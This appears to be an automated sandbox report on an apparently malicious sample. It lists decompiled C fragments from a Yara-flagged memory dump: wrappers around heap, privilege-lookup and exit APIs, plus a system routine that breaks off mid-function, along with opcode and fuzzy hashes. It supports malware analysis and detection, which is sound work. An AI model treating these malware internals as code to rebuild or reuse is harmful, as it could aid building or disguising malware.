                                                                                                                                                                				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                				return _t10;
                                                                                                                                                                			}






                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                                				void* _t10;
                                                                                                                                                                				void* _t15;
                                                                                                                                                                
                                                                                                                                                                				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                				return _t10;
                                                                                                                                                                			}






                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00418500(intOrPtr _a4, int _a8) {
                                                                                                                                                                				void* _t10;
                                                                                                                                                                
                                                                                                                                                                				_t5 = _a4;
                                                                                                                                                                				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                                				ExitProcess(_a8);
                                                                                                                                                                			}




                                                                                                                                                                0x00418503
                                                                                                                                                                0x0041851a
                                                                                                                                                                0x00418528

                                                                                                                                                                APIs
                                                                                                                                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%


                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                			E00B58788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				short* _v12;
                                                                                                                                                                				void* _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				signed int _v32;
                                                                                                                                                                				char _v36;
                                                                                                                                                                				signed int _v40;
                                                                                                                                                                				char _v44;
                                                                                                                                                                				signed int _v48;
                                                                                                                                                                				signed int _v52;
                                                                                                                                                                				signed int _v56;
                                                                                                                                                                				signed int _v60;
                                                                                                                                                                				char _v68;
                                                                                                                                                                				void* _t216;
                                                                                                                                                                				intOrPtr _t231;
                                                                                                                                                                				short* _t235;
                                                                                                                                                                				intOrPtr _t257;
                                                                                                                                                                				short* _t261;
                                                                                                                                                                				intOrPtr _t284;
                                                                                                                                                                				intOrPtr _t288;
                                                                                                                                                                				void* _t314;
                                                                                                                                                                				signed int _t318;
                                                                                                                                                                				short* _t319;
                                                                                                                                                                				intOrPtr _t321;
                                                                                                                                                                				void* _t328;
                                                                                                                                                                				void* _t329;
                                                                                                                                                                				char* _t332;
                                                                                                                                                                				signed int _t333;
                                                                                                                                                                				signed int* _t334;
                                                                                                                                                                				void* _t335;
                                                                                                                                                                				void* _t338;
                                                                                                                                                                				void* _t339;
                                                                                                                                                                
                                                                                                                                                                				_t328 = __edx;
                                                                                                                                                                				_t322 = __ecx;
                                                                                                                                                                				_t318 = 0;
                                                                                                                                                                				_t334 = _a4;
                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                				_v48 = 0;
                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                				_v52 = 0;
                                                                                                                                                                				if(_t334 == 0) {
                                                                                                                                                                					_t329 = 0xc000000d;
                                                                                                                                                                					L49:
                                                                                                                                                                					_t334[0x11] = _v56;
                                                                                                                                                                					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                					_t334[0x12] = _v60;
                                                                                                                                                                					_t334[0x13] = _v28;
                                                                                                                                                                					_t334[0x17] = _v20;
                                                                                                                                                                					_t334[0x16] = _v48;
                                                                                                                                                                					_t334[0x18] = _v40;
                                                                                                                                                                					_t334[0x14] = _v32;
                                                                                                                                                                					_t334[0x15] = _v52;
                                                                                                                                                                					return _t329;
                                                                                                                                                                				}
                                                                                                                                                                				_v56 = 0;
                                                                                                                                                                				if(E00B58460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                					_v56 = 1;
                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                						_t207 = E00B3E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                					}
                                                                                                                                                                					_push(1);
                                                                                                                                                                					_v8 = _t318;
                                                                                                                                                                					E00B5718A(_t207);
                                                                                                                                                                					_t335 = _t335 + 4;
                                                                                                                                                                				}
                                                                                                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                				if(E00B58460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                					_t333 =  *_v8;
                                                                                                                                                                					_v60 = _t333;
